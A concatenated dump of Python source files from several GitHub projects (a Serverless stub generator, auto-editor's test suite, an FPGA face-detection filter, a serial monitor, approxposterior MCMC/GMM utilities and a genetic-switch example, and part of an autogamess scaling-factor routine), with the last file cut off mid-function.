function_handlers = [f['functions'][x]['handler'] for x in f['functions']]
# Construct the file names we're looking for
filenames = []
for file in function_handlers:
filenames.append((file.split('.')[1], os.path.join(os.getcwd() + "/" +
file.split('.')[0] +
'.py')))
# Make sure the files we need exist, and create them if they are missing
for tup in filenames:
os.makedirs(os.path.dirname(tup[1]), exist_ok=True)
if not os.path.exists(tup[1]):
print("Creating "+ os.path.relpath(tup[1], os.getcwd()))
with open(tup[1], 'w'): pass
# Make sure the functions exist in the files
for tup in filenames:
with open(tup[1]) as fd:
file_contents = fd.read()
module = ast.parse(file_contents)
function_definitions = [node for node in module.body if isinstance(node, ast.FunctionDef)]
if tup[0] in [f.name for f in function_definitions]:
print("Found " + tup[0] + " in " + os.path.relpath(tup[1], os.getcwd()))
else:
print("Did not find " + tup[0] + " in " + os.path.relpath(tup[1], os.getcwd()) + ", stubbing out")
stub_out(tup[0], tup[1])
print("Stubbed out " + tup[0] + " in " + os.path.relpath(tup[1], os.getcwd()))
# Check for extra files
files_should_exisit = [tup[1] for tup in filenames]
files_that_exist = []
exclude_dirs = set([".serverless", "__pycache__", "lib"])
exclude_files = set(["serverless.yml", "requirements.txt", "package.json", "__init__.py"])
for root, dirs, files in os.walk(os.getcwd(), topdown=True):
dirs[:] = [d for d in dirs if d not in exclude_dirs]
files[:] = [f for f in files if f not in exclude_files]
for file in files:
files_that_exist.append((os.path.join(root, file)))
for x in [x for x in files_that_exist if x not in files_should_exisit]:
print("File " + os.path.relpath(x, os.getcwd()) + " may be unnecessary")
```
|
{
"source": "jedbrooke/auto-editor",
"score": 3
}
|
#### File: auto_editor/subcommands/test.py
```python
from __future__ import print_function
"""
Test auto-editor and make sure everything is working.
"""
# Internal Libraries
import os
import sys
import shutil
import platform
import subprocess
# Included Libraries
from auto_editor.utils.func import clean_list
from auto_editor.utils.log import Log
import auto_editor.vanparse as vanparse
from auto_editor import version as auto_editor_version
def test_options(parser):
parser.add_argument('--ffprobe_location', default='ffprobe',
help='point to your custom ffmpeg file.')
parser.add_argument('--only', '-n', nargs='*')
parser.add_argument('--help', '-h', action='store_true',
help='print info about the program or an option and exit.')
return parser
class FFprobe():
def __init__(self, path):
self.path = path
def run(self, cmd):
cmd.insert(0, self.path)
process = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, __ = process.communicate()
return stdout.decode('utf-8')
def pipe(self, cmd):
full_cmd = [self.path, '-v', 'error'] + cmd
process = subprocess.Popen(full_cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, __ = process.communicate()
return stdout.decode('utf-8')
def _get(self, file, stream, the_type, track, of='compact=p=0:nk=1'):
return self.pipe(['-select_streams', '{}:{}'.format(the_type, track),
'-show_entries', 'stream={}'.format(stream), '-of', of, file]).strip()
def getResolution(self, file):
return self._get(file, 'height,width', 'v', 0, of='csv=s=x:p=0')
def getTimeBase(self, file):
return self.pipe(['-select_streams', 'v', '-show_entries',
'stream=avg_frame_rate', '-of', 'compact=p=0:nk=1', file]).strip()
def getFrameRate(self, file):
nums = clean_list(self.getTimeBase(file).split('/'), '\r\t\n')
return int(nums[0]) / int(nums[1])
def getAudioCodec(self, file, track=0):
return self._get(file, 'codec_name', 'a', track)
def getVideoCodec(self, file, track=0):
return self._get(file, 'codec_name', 'v', track)
def getSampleRate(self, file, track=0):
return self._get(file, 'sample_rate', 'a', track)
def AudioBitRate(self, file):
def bitrate_format(num):
magnitude = 0
while abs(num) >= 1000:
magnitude += 1
num /= 1000.0
num = int(round(num))
return '%d%s' % (num, ['', 'k', 'm', 'g', 't', 'p'][magnitude])
exact_bitrate = self._get(file, 'bit_rate', 'a', 0)
return bitrate_format(int(exact_bitrate))
def pipe_to_console(cmd):
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
return process.returncode, stdout.decode('utf-8'), stderr.decode('utf-8')
def cleanup(the_dir):
for item in os.listdir(the_dir):
item = os.path.join(the_dir, item)
if('_ALTERED' in item or item.endswith('.xml') or item.endswith('.json')
or item.endswith('.fcpxml') or item.endswith('.mlt')):
os.remove(item)
if(item.endswith('_tracks')):
shutil.rmtree(item)
def clean_all():
cleanup('resources')
cleanup(os.getcwd())
def getRunner():
if(platform.system() == 'Windows'):
return ['py', '-m', 'auto_editor']
return ['python3', '-m', 'auto_editor']
def run_program(cmd):
no_open = '.' in cmd[0]
cmd = getRunner() + cmd
if(no_open):
cmd += ['--no_open']
returncode, stdout, stderr = pipe_to_console(cmd)
if(returncode > 0):
raise Exception('Test Failed.\n{}\n{}\n'.format(stdout, stderr))
def checkForError(cmd, match=None):
returncode, stdout, stderr = pipe_to_console(getRunner() + cmd)
if(returncode > 0):
if('Error!' in stderr):
if(match is not None and match not in stderr):
raise Exception('Test Failed.\nCould\'t find "{}"'.format(match))
else:
raise Exception('Test Failed.\nProgram crashed.\n{}\n{}'.format(stdout, stderr))
else:
raise Exception('Test Failed.\nProgram should not responsed with a code 0.')
def fullInspect(fileName, *args):
for item in args:
func = item[0]
expectedOutput = item[1]
if(func(fileName) != expectedOutput):
# Cheating on float numbers to allow 30 to equal 29.99944409236961
if(isinstance(expectedOutput, float)):
from math import ceil
if(ceil(func(fileName) * 100) == expectedOutput * 100):
continue
raise Exception('Inspection Failed. Was {}, Expected {}.'.format(
expectedOutput, func(fileName)))
class Tester():
def __init__(self, args):
self.passed_tests = 0
self.failed_tests = 0
self.allowable_fails = 1
self.args = args
def run_test(self, name, func, description='', cleanup=None):
if(self.args.only != [] and name not in self.args.only):
return
try:
print(name,end=" ",flush=True)
func()
except Exception as e:
self.failed_tests += 1
print('Failed.')
print(e)
clean_all()
if(self.failed_tests > self.allowable_fails):
sys.exit(1)
else:
self.passed_tests += 1
print('Passed.')
if(cleanup is not None):
cleanup()
def end(self):
print('{}/{}'.format(self.passed_tests, self.passed_tests + self.failed_tests))
clean_all()
if(self.failed_tests > self.allowable_fails):
sys.exit(1)
sys.exit(0)
def main(sys_args=None):
print("Testing auto-editor version",auto_editor_version)
parser = vanparse.ArgumentParser('test', 'version')
parser = test_options(parser)
if(sys_args is None):
sys_args = sys.args[1:]
# catch any exceptions thrown by the parser if it calls log.error()
try:
args = parser.parse_args(sys_args, Log(), 'test')
except RuntimeError:
exit(1)
ffprobe = FFprobe(args.ffprobe_location)
tester = Tester(args)
def help_tests():
run_program(['--help'])
run_program(['-h'])
run_program(['--frame_margin', '--help'])
run_program(['--frame_margin', '-h'])
run_program(['exportMediaOps', '--help'])
run_program(['exportMediaOps', '-h'])
run_program(['progressOps', '-h'])
run_program(['--help', '--help'])
run_program(['-h', '--help'])
run_program(['--help', '-h'])
run_program(['-h', '--help'])
tester.run_test('help_tests', help_tests, description='check the help option, '\
'its short, and help on options and groups.')
def version_debug():
run_program(['--version'])
run_program(['-v'])
run_program(['-V'])
run_program(['--debug'])
# sanity check for example.mp4/ffprobe
if(ffprobe.getFrameRate('example.mp4') != 30.0):
print('getFrameRate did not equal 30.0')
sys.exit(1)
tester.run_test('version_tests', version_debug)
def subtitle_tests():
from auto_editor.render.subtitle import SubtitleParser
test = SubtitleParser()
test.contents = [
[0, 10, "A"],
[10, 20, "B"],
[20, 30, "C"],
[30, 40, "D"],
[40, 50, "E"],
[50, 60, "F"],
]
speeds = [99999, 1]
chunks = [[0, 10, 1], [10, 20, 0], [20, 30, 1], [30, 40, 0], [40, 50, 1],
[50, 60, 0]]
test.edit(chunks, speeds)
if(test.contents != [[0, 10, "A"], [10, 20, "C"], [20, 30, "E"]]):
raise ValueError('Incorrect subtitle results.')
tester.run_test('subtitle_tests', subtitle_tests)
def info_tests():
run_program(['info', 'example.mp4'])
run_program(['info', 'resources/man_on_green_screen.mp4'])
run_program(['info', 'resources/multi-track.mov'])
run_program(['info', 'resources/newCommentary.mp3'])
run_program(['info', 'resources/test.mkv'])
tester.run_test('info_tests', info_tests)
def level_tests():
run_program(['levels', 'example.mp4'])
run_program(['levels', 'resources/newCommentary.mp3'])
tester.run_test('level_tests', level_tests, lambda a: os.remove('data.txt'))
def example_tests():
run_program(['example.mp4'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '1280x720'],
[ffprobe.getSampleRate, '48000'],
)
run_program(['example.mp4', '--video_codec', 'uncompressed'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '1280x720'],
[ffprobe.getVideoCodec, 'mpeg4'],
[ffprobe.getSampleRate, '48000'],
)
tester.run_test('example_tests', example_tests)
# Issue #200
def url_test():
run_program(['https://github.com/WyattBlue/auto-editor/raw/master/example.mp4'])
tester.run_test('url_test', url_test)
# Issue #172
def bitrate_test():
run_program(['example.mp4', '--audio_bitrate', '50k'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.AudioBitRate, '50k'],
)
tester.run_test('bitrate_test', bitrate_test)
# Issue #184
def unit_tests():
run_program(['example.mp4', '--mark_as_loud', '20s,22sec', '25secs,26.5seconds'])
run_program(['example.mp4', '--sample_rate', '44100'])
run_program(['example.mp4', '--sample_rate', '44100 Hz'])
run_program(['example.mp4', '--sample_rate', '44.1 kHz'])
run_program(['example.mp4', '--silent_threshold', '4%'])
tester.run_test('unit_tests', unit_tests,
description='''
Make sure all units are working appropriately. That includes:
- Seconds units: s, sec, secs, second, seconds
- Frame units: f, frame, frames
- Sample units: Hz, kHz
- Percent: %
''')
def backwards_range_test():
run_program(['example.mp4', '--edit', 'none', '--cut_out', '-5secs,end'])
run_program(['example.mp4', '--edit', 'all', '--add_in', '-5secs,end'])
tester.run_test('backwards_range_test', backwards_range_test, description='''
Cut out the last 5 seconds of a media file by using negative number in the
range.
''')
def cut_out_test():
run_program(['example.mp4', '--edit', 'none', '--video_speed', '2',
'--silent_speed', '3', '--cut_out', '2secs,10secs'])
run_program(['example.mp4', '--edit', 'all', '--video_speed', '2',
'--add_in', '2secs,10secs'])
tester.run_test('cut_out_test', cut_out_test)
def gif_test():
run_program(['resources/man_on_green_screen.gif', '--edit', 'none'])
tester.run_test('gif_test', gif_test, description='''
Feed auto-editor a gif file and make sure it can spit out a correctly formated
gif. No editing is requested.
''',
cleanup=clean_all)
def render_tests():
run_program(['example.mp4', '--render', 'opencv'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '1280x720'],
[ffprobe.getSampleRate, '48000'],
)
tester.run_test('render_tests', render_tests)
def margin_tests():
run_program(['example.mp4', '-m', '3'])
run_program(['example.mp4', '--margin', '3'])
run_program(['example.mp4', '-m', '0.3sec'])
run_program(['example.mp4', '-m', '6f'])
run_program(['example.mp4', '-m', '5 frames'])
run_program(['example.mp4', '-m', '0.4 seconds'])
tester.run_test('margin_tests', margin_tests)
def extension_tests():
shutil.copy('example.mp4', 'example')
checkForError(['example', '--no_open'], 'must have an extension.')
os.remove('example')
run_program(['example.mp4', '-o', 'example.mkv'])
os.remove('example.mkv')
run_program(['resources/test.mkv', '-o', 'test.mp4'])
os.remove('test.mp4')
tester.run_test('extension_tests', extension_tests)
def progress_ops_test():
run_program(['example.mp4', 'progressOps', '--machine_readable_progress'])
run_program(['example.mp4', 'progressOps', '--no_progress'])
tester.run_test('progress_ops_test', progress_ops_test)
def silent_threshold():
run_program(['resources/newCommentary.mp3', '--silent_threshold', '0.1'])
tester.run_test('silent_threshold', silent_threshold)
def track_tests():
run_program(['resources/multi-track.mov', '--cut_by_all_tracks'])
run_program(['resources/multi-track.mov', '--keep_tracks_seperate'])
run_program(['example.mp4', '--cut_by_this_audio', 'resources/newCommentary.mp3'])
tester.run_test('track_tests', track_tests)
def json_tests():
run_program(['example.mp4', '--export_as_json'])
run_program(['example.json'])
tester.run_test('json_tests', json_tests)
def speed_tests():
run_program(['example.mp4', '-s', '2', '-mcut', '10'])
run_program(['example.mp4', '-v', '2', '-mclip', '4'])
run_program(['example.mp4', '--sounded_speed', '0.5'])
run_program(['example.mp4', '--silent_speed', '0.5'])
tester.run_test('speed_tests', speed_tests)
def scale_tests():
run_program(['example.mp4', '--scale', '1.5', '--render', 'av'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '1920x1080'],
[ffprobe.getSampleRate, '48000'],
)
run_program(['example.mp4', '--scale', '0.2', '--render', 'av'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '256x144'],
[ffprobe.getSampleRate, '48000'],
)
run_program(['example.mp4', '--scale', '1.5', '--render', 'opencv'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '1920x1080'],
[ffprobe.getSampleRate, '48000'],
)
run_program(['example.mp4', '--scale', '0.2', '--render', 'opencv'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '256x144'],
[ffprobe.getSampleRate, '48000'],
)
tester.run_test('scale_tests', scale_tests)
def various_errors_test():
checkForError(['example.mp4', '--zoom', '0,60,1.5', '--render', 'av'])
checkForError(['example.mp4', '--zoom', '0'])
checkForError(['example.mp4', '--zoom', '0,60'])
checkForError(['example.mp4', '--rectangle', '0,60,0,10,10,20', '--render', 'av'])
checkForError(['example.mp4', '--rectangle', '0,60'])
checkForError(['example.mp4', '--background', '000'])
tester.run_test('various_errors_test', various_errors_test)
def create_sub_test():
run_program(['create', 'test', '--width', '640', '--height', '360', '-o',
'testsrc.mp4'])
fullInspect(
'testsrc.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '640x360'],
)
tester.run_test('create_sub_test', create_sub_test)
def effect_tests():
run_program(['testsrc.mp4', '--mark_as_loud', 'start,end', '--zoom', '10,60,2'])
run_program(['example.mp4', '--mark_as_loud', 'start,end', '--rectangle',
'audio>0.05,audio<0.05,20,50,50,100', 'audio>0.1,audio<0.1,120,50,150,100'])
run_program(['testsrc.mp4', '--mark_as_loud', 'start,end', '--zoom',
'start,end,1,0.5,centerX,centerY,linear', '--scale', '0.5'])
fullInspect(
'testsrc_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '320x180'],
)
run_program(['testsrc.mp4', '--mark_as_loud', 'start,end', '--rectangle',
'0,30,0,200,100,300,#43FA56,10'])
os.remove('testsrc_ALTERED.mp4')
os.remove('testsrc.mp4')
tester.run_test('effect_tests', effect_tests,
description='test the zoom and rectangle options',
cleanup=clean_all)
def export_tests():
for item in os.listdir('resources'):
if('man_on_green_screen' in item or item.startswith('.')):
continue
item = 'resources/{}'.format(item)
run_program([item])
run_program([item, '-exp'])
run_program([item, '-exr'])
run_program([item, '-exf'])
run_program([item, '-exs'])
run_program([item, '--export_as_clip_sequence'])
run_program([item, '--preview'])
cleanup('resources')
tester.run_test('export_tests', export_tests)
def codec_tests():
run_program(['example.mp4', '--video_codec', 'h264', '--preset', 'faster'])
run_program(['example.mp4', '--audio_codec', 'ac3'])
run_program(['resources/newCommentary.mp3', 'exportMediaOps', '-acodec', 'pcm_s16le'])
tester.run_test('codec_tests', codec_tests)
def combine_tests():
run_program(['example.mp4', '--mark_as_silent', '0,171', '-o', 'hmm.mp4'])
run_program(['example.mp4', 'hmm.mp4', '--combine_files', '--debug'])
os.remove('hmm.mp4')
tester.run_test('combine_tests', combine_tests)
def motion_tests():
run_program(['resources/man_on_green_screen.mp4', '--edit_based_on', 'motion',
'--debug', '--frame_margin', '0', '-mcut', '0', '-mclip', '0'])
run_program(['resources/man_on_green_screen.mp4', '--edit_based_on', 'motion',
'--motion_threshold', '0'])
tester.run_test('motion_tests', motion_tests)
def multi_processing_tests():
run_program(['example.mp4','--enable_multiprocessing'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '1280x720'],
[ffprobe.getSampleRate, '48000'],
)
run_program(['example.mp4', '--video_codec', 'uncompressed', '--enable_multiprocessing'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '1280x720'],
[ffprobe.getVideoCodec, 'mpeg4'],
[ffprobe.getSampleRate, '48000'],
)
tester.run_test('multi_processing_tests',multi_processing_tests)
tester.end()
if(__name__ == '__main__'):
main()
```
|
{
"source": "jedbrooke/FPGA-face-detection",
"score": 3
}
|
#### File: FPGA-face-detection/tests/face_filter.py
```python
import numpy as np
from PIL import Image
import sys
from centroid import centroid_from_numpy
IMG_SIZE = 256
WINDOW_SIZE = 9
SMOOTH_THRESH = 0.7
def isSkin(u,v):
return u > 26 and u < 74
def smoothWindow(window):
return np.sum(window) > ((WINDOW_SIZE ** 2) * 0.7)
def main(img_path):
img = np.genfromtxt(img_path,delimiter=",",dtype=np.uint8).reshape((IMG_SIZE,IMG_SIZE,3))
r = img[:,:,0].astype(np.int16)
g = img[:,:,1].astype(np.int16)
b = img[:,:,2].astype(np.int16)
u = r - g
v = b - g
mask = np.array([[isSkin(u[y,x],v[y,x]) for x in range(IMG_SIZE)] for y in range(IMG_SIZE)])
mask = np.array([[smoothWindow(mask[y-(WINDOW_SIZE // 2):y+(WINDOW_SIZE//2)+1,x-(WINDOW_SIZE // 2):x+(WINDOW_SIZE//2)+1]) for x in range(IMG_SIZE - (2*WINDOW_SIZE))] for y in range(IMG_SIZE - (2*WINDOW_SIZE))])
h,w = mask.shape
centroids = centroid_from_numpy(mask.reshape((h,w,1)))
if type(centroids) == type(()):
centroids = [centroids]
for centroid_x,centroid_y in centroids:
print(centroid_x,centroid_y)
mask = mask.astype(np.uint8) * 255
mask_rgb = np.dstack((mask,mask,mask))
for centroid_x,centroid_y in centroids:
mask_rgb[centroid_y-(WINDOW_SIZE//4):centroid_y+(WINDOW_SIZE//4)+1,centroid_x-(WINDOW_SIZE//4):centroid_x+(WINDOW_SIZE//4)+1] = [255,0,0]
Image.fromarray(mask_rgb).save("test.png",mode="RGB")
if __name__ == '__main__':
main(sys.argv[1])
```
|
{
"source": "jedbrooke/la-hacks-2021",
"score": 3
}
|
#### File: jedbrooke/la-hacks-2021/SerialMonitor.py
```python
from ece121 import Protocol
import time
import datetime
def MonitorPrint(inBytes):
Message = inBytes[1:]
ID = inBytes[0]
try:
IDString = Protocol.MessageIDs(ID).name
except ValueError:
IDString = "Invalid ID ({})".format(ID)
# print(IDString)
try:
Message = Message.decode('ascii')
except UnicodeError:
pass
print("{}\t{}\t{}".format(datetime.datetime.now(), IDString, Message))
return
def DisconnectHandler(inException):
print(inException)
while True:
time.sleep(.1)
if prot.Connect():
print("Connected to {}".format(prot.Port))
break
return
print("Current Serial Ports", Protocol.Protocol.listSerialPorts())
prot = Protocol.Protocol()
for enum in Protocol.MessageIDs:
prot.registerMessageHandler(enum, MonitorPrint)
# prot.registerHandler(Protocol.MessageIDs.ID_DEBUG, MonitorPrint)
prot.registerErrorHandler(DisconnectHandler)
if not prot.activeConnection:
print("No Serial Port Found")
while True:
time.sleep(.1)
if prot.Connect():
print("Connected to {}".format(prot.Port))
break
while True:
time.sleep(1)
```
|
{
"source": "jedbrown/approxposterior",
"score": 3
}
|
#### File: approxposterior/approxposterior/gmm_utils.py
```python
from __future__ import (print_function, division, absolute_import,
unicode_literals)
# Tell module what it's allowed to import
__all__ = ["fit_gmm"]
import numpy as np
from sklearn.model_selection import GridSearchCV
from sklearn.mixture import GaussianMixture
def fit_gmm(sampler, iburn, max_comp=6, cov_type="full", use_bic=True):
"""
Fit a Gaussian Mixture Model to the posterior samples to derive an
approximation of the posterior density. Fit for the number of components
by either minimizing the Bayesian Information Criterior (BIC) or via
cross-validation.
Parameters
----------
sampler : emcee.EnsembleSampler
sampler object containing the MCMC chains
iburn : int
number of burn-in steps to discard for fitting
max_comp : int (optional)
Maximum number of mixture model components to fit for. Defaults to 6.
cov_type : str (optional)
GMM covariance type. Defaults to "full". See the documentation here:
http://scikit-learn.org/stable/modules/generated/sklearn.mixture.GaussianMixture.html
for more info
use_bic : bool (optional)
Minimize the BIC to pick the number of GMM components or use cross
validation? Defaults to True (aka, use the BIC)
Returns
-------
GMM : sklearn.mixture.GaussianMixture
fitted Gaussian mixture model
"""
# Select optimal number of components via minimizing BIC
if use_bic:
bic = []
lowest_bic = 1.0e10
best_gmm = None
gmm = GaussianMixture()
for n_components in range(1,max_comp+1):
gmm.set_params(**{"n_components" : n_components,
"covariance_type" : cov_type})
gmm.fit(sampler.flatchain[iburn:])
bic.append(gmm.bic(sampler.flatchain[iburn:]))
if bic[-1] < lowest_bic:
lowest_bic = bic[-1]
best_gmm = gmm
# Refit GMM with the lowest bic
GMM = best_gmm
GMM.fit(sampler.flatchain[iburn:])
# Select optimal number of components via 5 fold cross-validation
else:
hyperparams = {"n_components" : np.arange(max_comp+1)}
gmm = GridSearchCV(GaussianMixture(covariance_type=cov_type),
hyperparams, cv=5)
gmm.fit(sampler.flatchain[iburn:])
GMM = gmm.best_estimator_
GMM.fit(sampler.flatchain[iburn:])
return GMM
# end function
```
#### File: approxposterior/approxposterior/mcmc_utils.py
```python
from __future__ import (print_function, division, absolute_import,
unicode_literals)
# Tell module what it's allowed to import
__all__ = ["autocorr","estimate_burnin"]
import numpy as np
import emcee
from scipy.interpolate import UnivariateSpline
def autocorr(x):
"""
Compute the autocorrelation function
http://stackoverflow.com/q/14297012/190597
http://en.wikipedia.org/wiki/Autocorrelation#Estimation
Parameters
----------
x : array
Returns
-------
result : array
ACF
"""
n = len(x)
variance = x.var()
x = x-x.mean()
r = np.correlate(x, x, mode = 'full')[-n:]
result = r/(variance*(np.arange(n, 0, -1)))
return result
# end function
def estimate_burnin(sampler, nwalk, nsteps, ndim):
"""
Given an MCMC chain, estimate the burn-in time (credit: <NAME>)
This function computes the maximum autocorrelation length of all the walkers
that clearly haven't strayed too far from the converged answer. If your
chains have converged, this function provides a conservative estimate of the
burn-in. As with all things, MCMC, your mileage will vary. Currently this
function just supports emcee.
Parameters
----------
sampler : emcee.EnsembleSampler
nwalk : int
Number of walkers
nsteps : int
Number of MCMC steps (iterations)
ndim : int
Data dimensionality (number of parameters)
Returns
-------
iburn : int
Index corresponding to estimated burn-in length scale
"""
iburn = 0
ikeep = []
autoc = []
autolength = []
walkers = np.arange(nwalk)
iterations = np.arange(nsteps)
# Loop over number of free parameters
for j in range(ndim):
# Loop over walkers
for i in range(nwalk):
# Get list of other walker indicies
walkers = np.arange(nwalk)
other_iwalkers = np.delete(walkers, i)
# Calculate the median of this chain
med_chain = np.median(sampler.chain[i,iburn:,j])
# Calculate the mean of this chain
mean_chain = np.mean(sampler.chain[i,iburn:,j])
# Calculate the median and std of all the other chains
med_other = np.median(sampler.chain[other_iwalkers,iburn:,j])
std_other = np.std(sampler.chain[other_iwalkers,iburn:,j])
# If this chain is within 3-sig from all other chain's median
if np.fabs(mean_chain - med_other) < 3*std_other:
# Keep it!
ikeep.append(i)
# Get autocorrelation of chain
autoci = autocorr(sampler.chain[i,iburn:,j])
autoc.append(autoci)
# Fit with spline
spline = UnivariateSpline(iterations, autoci, s=0)
# Find zero crossings
roots = spline.roots()
# Save autocorrelation length
autolength.append(np.min(roots))
# List of chains that we are keeping
ikeep = list(set(ikeep))
# Set burn-in index to maximum autocorrelation length
return int(np.max(autolength))
# end function
```
#### File: approxposterior/examples/genetic.py
```python
import numpy as np
from scipy.integrate import odeint
import emcee
import corner
from approxposterior import mcmc_utils
from approxposterior.pool import Pool
import matplotlib as mpl
import matplotlib.pyplot as plt
mpl.rcParams.update({'font.size': 18})
def genetic_model(y, t, alpha1, alpha2, gamma, beta, eta, IPTG, K):
# u = y[0], v = y[1]
u, v = y
w = u/(1.0 + np.power(IPTG/K,eta))
return [alpha1/(1.0 + np.power(v,beta)) - u, alpha2/(1.0 + np.power(w,gamma)) - v]
# end function
def genetic_lnprior(x):
"""
Uniform log prior for the genetic switch likelihood following Wang & Li (2017)
where the prior pi(x) is a uniform distribution for each parameter.
Parameters
----------
x : array
Returns
-------
l : float
log prior
"""
x = np.array(x)
if x.ndim > 1:
alpha1 = x[:,0]
alpha2 = x[:,1]
gamma = x[:,2]
beta = x[:,3]
eta = x[:,4]
K = x[:,5]
else:
alpha1, alpha2, gamma, beta, eta, K = x
# All flat priors from Wang & Li (2017)
if np.any(alpha1 < 120.0) or np.any(alpha1 > 200.0):
return -np.inf
elif np.any(alpha2 < 15.0) or np.any(alpha2 > 16.0):
return -np.inf
elif np.any(gamma < 2.1) or np.any(gamma > 2.9):
return -np.inf
elif np.any(beta < 0.85) or np.any(beta > 1.15):
return -np.inf
elif np.any(eta < 1.3) or np.any(eta > 2.7):
return -np.inf
elif np.any(K < np.log10(2.3e-5)) or np.any(K > np.log10(3.7e-5)):
return -np.inf
else:
return 0.0
# end function
def genetic_sample(n):
"""
Sample N points from the prior pi(x) is a uniform distribution over
ranges given in Wang & Li (2017) for the genetic toggle example.
Parameters
----------
n : int
Number of samples
Returns
-------
sample : floats
n x 6 array of floats samples from the prior
"""
alpha1 = np.random.uniform(low=120.0, high=200.0, size=(n,1))
alpha2 = np.random.uniform(low=15.0, high=16.0, size=(n,1))
gamma = np.random.uniform(low=2.1, high=2.9, size=(n,1))
beta = np.random.uniform(low=0.85, high=1.15, size=(n,1))
eta = np.random.uniform(low=1.3, high=2.7, size=(n,1))
K = np.random.uniform(low=np.log10(2.3e-5), high=np.log10(3.7e-5), size=(n,1)) # Log prior
return np.hstack([alpha1, alpha2, gamma, beta, eta, K]).squeeze()
# end function
def genetic_lnlike(x):
"""
Log-likelihood for the genetic switch likelihood following Wang & Li (2017).
Valid for the following "true" forward model parameters:
alpha1 = 143.0
alpha2 = 15.95
gamma = 2.70
beta = 0.96
eta = 2.34
K = 2.7e-5
IPTG = 1.0e-6
observable: 3.1826343015096331e-05 (v concentration at t=10)
noise level: 0.022360679774997897 (sqrt(5.0e-4))
Parameters
----------
x : array
Returns
-------
l : float
lnlike
"""
# True value, error, true value + error (error sampled from N(0,err^2))
obs = np.array([-0.0328982971670082,
15.984925746386871,
15.900771796186838,
15.96194037051973,
15.970237000713183,
15.945775511242514])
err = 0.0224
IPTG_arr = [1.0e-6, 5.0e-4, 7.0e-4, 1.0e-3, 3.0e-3, 5.0e-3]
model = list() # Holds forward model outputs
# Unpack data
x = np.array(x)
if x.ndim > 1:
alpha1 = x[:,0]
alpha2 = x[:,1]
gamma = x[:,2]
beta = x[:,3]
eta = x[:,4]
K = x[:,5]
else:
alpha1, alpha2, gamma, beta, eta, K = x
# Run forward model to get prediction (final value of v)
t = np.linspace(0.0, 10.0, 100)
y0 = [1.0e-2, 1.0e-2] # results not sensitive to initial conditions
for IPTG in IPTG_arr:
sol = odeint(genetic_model, y0, t, args=(alpha1, alpha2, gamma, beta, eta, IPTG, 10**K),
full_output=False)
model.append(float(sol[-1,1]))
return -0.5*np.sum((obs - np.array(model))**2 / err**2)
# end function
def lnprob(x):
lp = genetic_lnprior(x)
if not np.isfinite(lp):
return -np.inf
return lp + genetic_lnlike(x)
ndim = 6 # Number of dimensions
nsteps = 100 # Number of MCMC iterations
verbose = True # Don't output lots of stuff
nwalk = 10 * ndim # Use 10 walkers per dimension
# Initial guess for walkers (random over prior)
p0 = [genetic_sample(1) for j in range(nwalk)]
sampler = emcee.EnsembleSampler(nwalk, ndim, lnprob, pool=Pool())
for i, result in enumerate(sampler.sample(p0, iterations=nsteps)):
if verbose:
print("%d/%d" % (i+1, nsteps))
print("emcee finished!")
iburn = mcmc_utils.estimate_burnin(sampler, nwalk, nsteps, ndim)
print(iburn)
fig = corner.corner(sampler.flatchain[iburn:],
quantiles=[0.16, 0.5, 0.84],
plot_contours=True, show_titles=True);
plt.show()
```
|
{
"source": "jedbrown/autogamess",
"score": 3
}
|
#### File: autogamess/autogamess/generate_scaling_factors.py
```python
from .config import *
from openpyxl import load_workbook
def generate_scaling_factors(projdir, expt_dict, species):
"""
This function generates scaling factors and scaled frequencies.
Parameters
----------
projdir: string
This should be a full directory string pointing to the project
directory initlly created by new_project.
expt_dict: dictionary
This should be a python dictionary with the experimental frequency
values for all species that the user wants to generate scaling factors
for in it. Format is explained in Notes section.
species: list
This should be a list of all species the user would like scaling factors
generated for. Any molecule in the list must have experimental data in
the `expt_dict` associated with it.
Notes
-------
`expt_dict` format should be as follows:
{`specie`: [`nu_1`, `nu_2`, ... , `nu_N`]}
where `specie` must be written the same way as the Excel spreadsheet file
for that molecule is written. Each frequency, `nu`, should be given in
the same order as they appear (left to right) in the spreadsheet.
`species` list format can be in any order but must adhere to the rule
that any element in `species` is a key for `expt_dict`
Once execution of this function is completed the `Hessian` worksheet
will be updated to have a coulmn giving `Scaling Factor/RMS`, as well
as the scaled frequencies will appear in parathesis next to the predicted
frequencies.
Returns
-------
This function returns nothing.
Example
-------
>>> import autogamess as ag
>>>
>>> projdir = './Your Project Title/'
>>> expt_dict = {'H2O': [1595, 3657, 3756]}
>>> species = ['H2O']
>>>
>>> ag.generate_scaling_factors(projdir, expt_dict, species)
>>>
"""
#string variables
sheetsdir = projdir + 'Spreadsheets/'
xlsx = '.xlsx'
hes = 'Hessian'
for specie in species:
if os.path.isfile(sheetsdir + specie + xlsx):
df = pd.read_excel(sheetsdir + specie + xlsx, index_col=0,
sheet_name=hes, header=6)
df2 = pd.read_excel(sheetsdir + specie + xlsx, index_col=0,
sheet_name=hes, header=6)
#get only frequency columns
x = [col for col in df.columns if 'Vibrational' not in col]
df.drop(x, axis=1, inplace=True)
df.dropna(inplace=True)
#get expt data from dictionary
expt = expt_dict[specie]
df2['Scaling Factor/RMS'] = np.nan
#iterate through DataFrame
for i,j in df.iterrows():
theo = list(j.values)
#get scaling factors
